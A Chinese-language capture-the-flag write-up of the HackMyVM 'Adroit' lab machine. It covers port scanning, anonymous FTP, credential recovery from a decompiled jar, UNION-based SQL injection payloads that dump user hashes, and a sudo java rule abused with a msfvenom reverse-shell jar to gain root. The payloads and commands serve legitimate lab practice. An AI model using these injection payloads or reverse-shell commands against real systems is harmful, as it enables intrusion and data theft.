tags:
- HMV
- java反编译
- SQL注入
1. 基本信息^toc
文章目录
- 1. 基本信息^toc
- 2. 信息收集
- 3. java反编译
- 4. sql注入
- 5. 解密密码
- 6. 提权
靶机链接 https://hackmyvm.eu/machines/machine.php?vm=Adroit
作者 alienum
难度 ⭐️⭐️⭐️⭐️️
2. 信息收集
┌──(root㉿kali)-[~]
└─# fscan -h 192.168.80.11___ _/ _ \ ___ ___ _ __ __ _ ___| | __/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\fscan version: 1.8.4
start infoscan
192.168.80.11:3306 open
192.168.80.11:3000 open
192.168.80.11:21 open
192.168.80.11:22 open
[*] alive ports len is: 4
start vulscan
[+] ftp 192.168.80.11:21:anonymous[->]pubftp
ftp> ls -a
229 Entering Extended Passive Mode (|||40570|)
150 Here comes the directory listing.
drwxr-xr-x 2 ftp ftp 4096 Mar 19 2021 .
drwxr-xr-x 3 ftp ftp 4096 Jan 14 2021 ..
-rw-r--r-- 1 ftp ftp 5451 Jan 14 2021 adroitclient.jar
-rw-r--r-- 1 ftp ftp 229 Mar 19 2021 note.txt
-rw-r--r-- 1 ftp ftp 36430 Jan 14 2021 structure.PNGstructrue.png
3. java反编译
获取到secret Sup3rS3cur3Dr0it
域名 adroit.local
用户名 zeus 域名 god.thunder.olympus
添加一个域名 adroit.local
尝试运行一下jar包
这里我用jdk8运行不了 ,切换到jdk11可以运行
提示输入账户密码 挨个测试即可
┌──(root㉿kali)-[/home/kali/hmv/Adroit]
└─# java -jar adroitclient.jar
Enter the username :
zeus
Enter the password :
Sup3rS3cur3Dr0it
Wrong username or password ┌──(root㉿kali)-[/home/kali/hmv/Adroit]
└─# java -jar adroitclient.jar
Enter the username :
zeus
Enter the password :
god.thunder.olympus
Options [ post | get ] :
get
Enter the phrase identifier :
1god.thunder.olympus 就是密码
4. sql注入
┌──(root㉿kali)-[/home/kali/hmv/Adroit]
└─# java -jar adroitclient.jar
Enter the username :
zeus
Enter the password :
god.thunder.olympus
Options [ post | get ] :
get
Enter the phrase identifier :1 union select 1,database() -- -
--> adroit1 union select 1,group_concat(table_name) FROM information_schema.tables WHERE table_schema ='adroit' -- -
--> ideas,users1 union select 1,group_concat(column_name) from information_schema.columns where table_name ='users' -- -
-->
id,username,password,USER,CURRENT_CONNECTIONS,TOTAL_CONNECTIONS1 union select 1,group_concat(username,0x3a,password) from users -- -
--> writer:l4A+n+p+xSxDcYCl0mgxKr015+OEC3aOfdrWafSqwpY=
获取到了账户密码 writer:l4A+n+p+xSxDcYCl0mgxKr015+OEC3aOfdrWafSqwpY=
但是密码是加密的
但是加密的
5. 解密密码
解密的代码可以在jar包反编译中发现
密钥上面获取到了是 Sup3rS3cur3Dr0it
但是注意这里需要将0换成O
所以正确的密钥是 Sup3rS3cur3DrOit
参考 Mikannse的wp对这个进行解密
获取到密码是 just.write.my.ideas
6. 提权
利用账户密码登录
writer : just.write.my.ideas
┌──(root㉿kali)-[/home/kali/hmv/Adroit]
└─# ssh writer@192.168.80.11
writer@192.168.80.11''s password:
Linux adroit 4.19.0-13-amd64 #1 SMP Debian 4.19.160-2 (2020-11-28) x86_64The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Jan 14 23:14:06 2021 from 10.0.2.15
writer@adroit:~$ id
uid=1000(writer) gid=1000(writer) groups=1000(writer),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth)
writer@adroit:~$ whoami
writerwriter@adroit:~$ sudo -l
[sudo] password for writer:
Matching Defaults entries for writer on adroit:env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/binUser writer may run the following commands on adroit:(root) /usr/bin/java -jar /tmp/testingmyapp.jarmsf生成jar包 反弹shell
msfvenom -p java/shell_reverse_tcp lhost=192.168.80.5 lport=4444 -f jar -o reverse.jarwriter@adroit:/tmp$ cp reverse.jar /tmp/testingmyapp.jar
writer@adroit:/tmp$ sudo -u root java -jar /tmp/testingmyapp.jar[17:54:28] Welcome to pwncat 🐈! __main__.py:164
[17:56:16] received connection from 192.168.80.11:51550 bind.py:84
[17:56:17] 0.0.0.0:4444: upgrading from /usr/bin/dash to /usr/bin/bash manager.py:957192.168.80.11:51550: registered new host w/ db manager.py:957
(local) pwncat$
(remote) root@adroit:/tmp# whoami
root
(remote) root@adroit:/root# ls
root.txt
(remote) root@adroit:/root# cat root.txt
017a030885f25af277dd891d0f151845
(remote) root@adroit:/root# cd /home/writer/
(remote) root@adroit:/home/writer# cat user.txt
61de3a25161dcb2b88b5119457690c3c
(remote) root@adroit:/home/writer#
我觉得这个靶场不算难。难点只是在分析java代码那里,不过我看不懂java
